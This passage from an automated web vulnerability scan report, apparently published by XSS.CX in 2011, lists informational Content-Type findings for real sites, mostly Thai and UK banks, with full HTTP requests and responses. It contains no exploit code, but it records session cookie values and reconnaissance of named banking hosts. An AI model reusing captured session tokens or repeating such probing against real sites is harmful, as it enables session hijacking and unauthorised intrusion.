Host:   http://www.nbcuniversalstore.com
Path:   /nbcuniversalstore/layout/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /nbcuniversalstore/layout/favicon.ico HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 08 Nov 2010 20:13:44 GMT
ETag: "9480d7-37e-4949042d06e00"
Accept-Ranges: bytes
Content-Length: 894
Content-Type: text/plain
Date: Tue, 03 May 2011 13:32:58 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...

33.59. http://www.scb.co.th/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scb.co.th
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.scb.co.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=pheig1kjk8ik69qvdja76e1mm0; _cbclose=1; _cbclose8098=1; _uid8098=5CC397F4.1; _ctout8098=1; __utmz=37298082.1304443497.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Siam%20Commercial%20Bank; __utma=37298082.1832332674.1304443497.1304443497.1304443497.1; __utmc=37298082; __utmb=37298082.1.10.1304443497

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:23:24 GMT
Server: Apache
Last-Modified: Tue, 02 Nov 2010 11:50:00 GMT
Accept-Ranges: bytes
Content-Length: 2238
Cache-Control: public
Expires: Thu, 02 Jun 2011 12:23:24 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

...... ..............(... ...@................................,s..P..}.V.z.Y.t
`.t
a.y.Z.T4...|..........O<..X.......Q8..y.Y.O;..............LA..V2......JB..`$z........Y-..b"y.....!x..%s............
...[SNIP]...

33.60. https://www.scbbusinessnet.com/cs70_banking/js/bank-online.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/bank-online.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /cs70_banking/js/bank-online.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:29 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 12 Jan 2010 03:38:40 GMT
Accept-Ranges: bytes
Content-Length: 397
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scbeasy.com" target="_blank">EASY NET</a></li>
<li><a href="http://www.scbbusinessnet.com" target="_blank">BUSINESS NET</a></li>
   <li><a href="http://www.scb-fx
...[SNIP]...

33.61. https://www.scbbusinessnet.com/cs70_banking/js/scb-quick-link.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/js/scb-quick-link.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /cs70_banking/js/scb-quick-link.html HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html, */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
X-Requested-With: XMLHttpRequest
Referer: https://www.scbbusinessnet.com/cs70_banking/logon/sbuser
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:30 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 23 Jul 2010 15:05:31 GMT
Accept-Ranges: bytes
Content-Length: 1573
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

...<ul>
   <li><a href="http://www.scb.co.th/th/oth/rate.shtml" target="_blank">Interest Rates and Fees</a></li>
<li><a href="http://www.scb.co.th/scb_api/index.jsp" target="_blank">Exchanges Rate
...[SNIP]...

33.62. https://www.scbbusinessnet.com/cs70_banking/news/css/style.txt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.scbbusinessnet.com
Path:   /cs70_banking/news/css/style.txt

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain CSS.

Request

GET /cs70_banking/news/css/style.txt HTTP/1.1
Host: www.scbbusinessnet.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.scbbusinessnet.com/cs70_banking/news/en/scbbus-home-des.html
Cookie: JSESSIONID=0000UmRT5BttaDJABng-q6FdDT1:13a187qhd

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:44:32 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 20 Jan 2010 06:33:24 GMT
Accept-Ranges: bytes
Content-Length: 7168
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain

body{
   overflow-x:hidden;
}

.TextMainBlack {
   font-family: "Tahoma", sans-serif;
   font-size: 12px;
   font-style: normal;
   line-height: normal;
   font-weight: normal;
   font-variant: normal;
   
...[SNIP]...

33.63. http://www.scriptlogic.com/_commonfiles/controls/omniturizer.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.scriptlogic.com
Path:   /_commonfiles/controls/omniturizer.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /_commonfiles/controls/omniturizer.aspx HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:31:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4133


var pageName = location.pathname.replace(/\//g,">");
pageName=pageName.substring(1,pageName.length).toLowerCase();
if (pageName.length == 0)
pageName = "Default"

if ((pageName.length-1) -
...[SNIP]...

33.64. http://www.set.or.th/menuFile/topMenu2009-th.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.set.or.th
Path:   /menuFile/topMenu2009-th.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /menuFile/topMenu2009-th.js HTTP/1.1
Host: www.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/th/index.html

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:35 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 11:20:09 GMT
ETag: "dc6e8-3fc4-f15cc40"
Accept-Ranges: bytes
Content-Length: 16324
Content-Type: application/x-javascript

var cURL = 'http://www.set.or.th';
var c1URL = 'http://www.set.or.th';
var mURL = 'http://marketdata.set.or.th';
var demoMenu =
[
[null, '<img src="/images/menu-left.gif" border="0"/>', null, n
...[SNIP]...

33.65. http://www.zlmc.org/membership.html  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.zlmc.org
Path:   /membership.html

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /membership.html HTTP/1.1
Host: www.zlmc.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.zlmc.org/
Cookie: e7c4e00d12966c6a9d383111e612e1a5=365b943ca2f1b614f235e4910df6f14c; __utma=1.1018395735.1304447535.1304447535.1304447535.1; __utmb=1.2.10.1304447535; __utmc=1; __utmz=1.1304447535.1.1.utmgclid=CLbmzNHyy6gCFUff4AodPQinqQ|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 403 FORBIDDEN
Date: Tue, 03 May 2011 13:44:42 GMT
Server: Apache/2.2.17
X-Powered-By: PHP/5.2.11
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html
Content-Length: 77

<h1>Forbidden access</h1><p><font size="2" color="grey">(Flooding)</font></p>

33.66. http://www22.glam.com/cTagsImg.act  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www22.glam.com
Path:   /cTagsImg.act

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cTagsImg.act HTTP/1.1
Host: www22.glam.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ctags=%3bct%3dbarhp; __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611;

Response

HTTP/1.1 500 Internal Server Error
Server: Apache
Content-Length: 41
Content-Type: text/html
ETag: "d50d5228dd2483ff2a750361030cb091:1274158213"
X-Glam-Content: image/gif
Cache-Control: max-age=384
Date: Tue, 03 May 2011 13:34:45 GMT
Connection: close

Glam Error: bad request on www22.glam.com

34. Content type is not specified  previous
There are 9 instances of this issue:

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


34.1. http://propertyforsale.kasikornbank.com/PropertyForSaleAnnouncement/1,2098,,00.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://propertyforsale.kasikornbank.com
Path:   /PropertyForSaleAnnouncement/1,2098,,00.html

Request

GET /PropertyForSaleAnnouncement/1,2098,,00.html HTTP/1.1
Host: propertyforsale.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:20:37 GMT
X-Powered-By: ASP.NET
Connection: close
Set-Cookie: vgnvisitor=5-GEM0001rg000Ykjs019nQ3d6; path= /; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Set-Cookie: checkPropertyAnnouncement=Y2hlY2tQcm9wZXJ0eUFubm91bmNlbWVudA==; path=/
Content-Type: text/html

<!-- Vignette V/5 Tue May 03 20:20:37 2011 -->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.o
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="Pragma" content="no-cache" />
...[SNIP]...

34.2. http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /Online%20Banking/For%20Personal/iBanking/Pages/1

Request

GET /Online%20Banking/For%20Personal/iBanking/Pages/1 HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/Online%20Banking/For%20Personal/iBanking/Pages/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCQDDQRCA=CDNLAAIDONLFLNJJKKMMJIGB; ASPSESSIONIDCADTTCQT=NFGICGIDOHJAODGEJHPJHDHE; _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.1; visit_time=1591

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 645
Exires: Mon, 18 Apr 2011 12:11:37 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:11:36 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

34.3. http://www.bangkokbank.com/bangkok%20bank/pages/blank.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /bangkok%20bank/pages/blank.gif

Request

GET /bangkok%20bank/pages/blank.gif HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 645
Exires: Mon, 18 Apr 2011 11:45:17 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:45:17 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

34.4. http://www.bangkokbank.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bangkokbank.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDCADTTCQT=HJBJCGIDKBNEBONIDMFMOFBD; _cbclose=1; _cbclose7180=1; _uid7180=55ED3A63.1; _ctout7180=1

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 645
Exires: Mon, 18 Apr 2011 12:36:46 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 12:36:46 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

34.5. http://www.bangkokbank.com/layouts/NR/BangkokBank/images/homepage/head_line.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /layouts/NR/BangkokBank/images/homepage/head_line.gif

Request

GET /layouts/NR/BangkokBank/images/homepage/head_line.gif HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/bangkok%20bank/pages/main.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 645
Exires: Mon, 18 Apr 2011 11:45:19 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:45:19 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

34.6. http://www.bangkokbank.com/online%20banking%20thai/for%20business/biz%20ibanking/pages/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokbank.com
Path:   /online%20banking%20thai/for%20business/biz%20ibanking/pages/1

Request

GET /online%20banking%20thai/for%20business/biz%20ibanking/pages/1 HTTP/1.1
Host: www.bangkokbank.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokbank.com/online%20banking%20thai/for%20business/biz%20ibanking/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADTTCQT=FHPMCGIDKOLFGHCINFLJMINK; ASPSESSIONIDCQDDQRCA=FIEABAIDHHEEKJEMIMGGDMJG; _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 404 NOT FOUND
Cache-Control: private,max-age=0
Content-Length: 645
Exires: Mon, 18 Apr 2011 19:33:55 GMT
Public-Extension: http://schemas.microsoft.com/repl-2
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 19:33:55 GMT
Age: 0
Proxy-Connection: close
Via: HTTP/1.1 BangkokBank.com (0 [cMs f ])

<!-- _localBinding -->
<!-- _lcid="1033" _version="" -->
<html>
<head>
   <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8" />
   <meta HTTP-EQUIV="Expires" content="0" />
   <noscri
...[SNIP]...

34.7. http://www.barclays.co.uk/images/popup_green.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.barclays.co.uk
Path:   /images/popup_green.gif

Request

GET /images/popup_green.gif HTTP/1.1
Host: www.barclays.co.uk
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SS_X_JSESSIONID=00004_zLOQV_87a8PfwOVHjEuuh%3A149iif9ed; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304454264566:ss=1304454071727; mbox=session#1304436163124-351101#1304438125|check#true#1304436325

Response

HTTP/1.1 404 Not found
Server: GREEN
Date: Tue, 03 May 2011 10:24:43 GMT
Content-Length: 11651

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Page cannot be found - Barcla
...[SNIP]...
<meta name="WT.ti" content="Page cannot be found-Barclays-Barclays" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="Description" content="Barclays 404 page with links to other pages in the site." />
...[SNIP]...

34.8. http://www.bot.or.th/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bot.or.th
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.bot.or.th
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose6672=1; _uid6672=8A158878.1; _ctout6672=1; WT_FPC=id=173.193.214.243-1855903296.30148999:lv=1304484256517:ss=1304484256517

Response

HTTP/1.1 404 NOT FOUND
Date: Tue, 03 May 2011 11:44:25 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Exires: Mon, 18 Apr 2011 11:44:25 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

34.9. http://www.bot.or.th/x26amp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bot.or.th
Path:   /x26amp

Request

GET /x26amp HTTP/1.1
Host: www.bot.or.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _ctout6672=1; _uid6672=8A158878.1; WT_FPC=id=173.193.214.243-1855903296.30148999:lv=1304484256517:ss=1304484256517; _cbclose6672=1; _cbclose=1;

Response

HTTP/1.1 404 NOT FOUND
Connection: close
Date: Tue, 03 May 2011 13:33:29 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Exires: Mon, 18 Apr 2011 13:33:29 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2

404 NOT FOUND

Report generated by XSS.CX at Tue May 03 19:48:49 CDT 2011.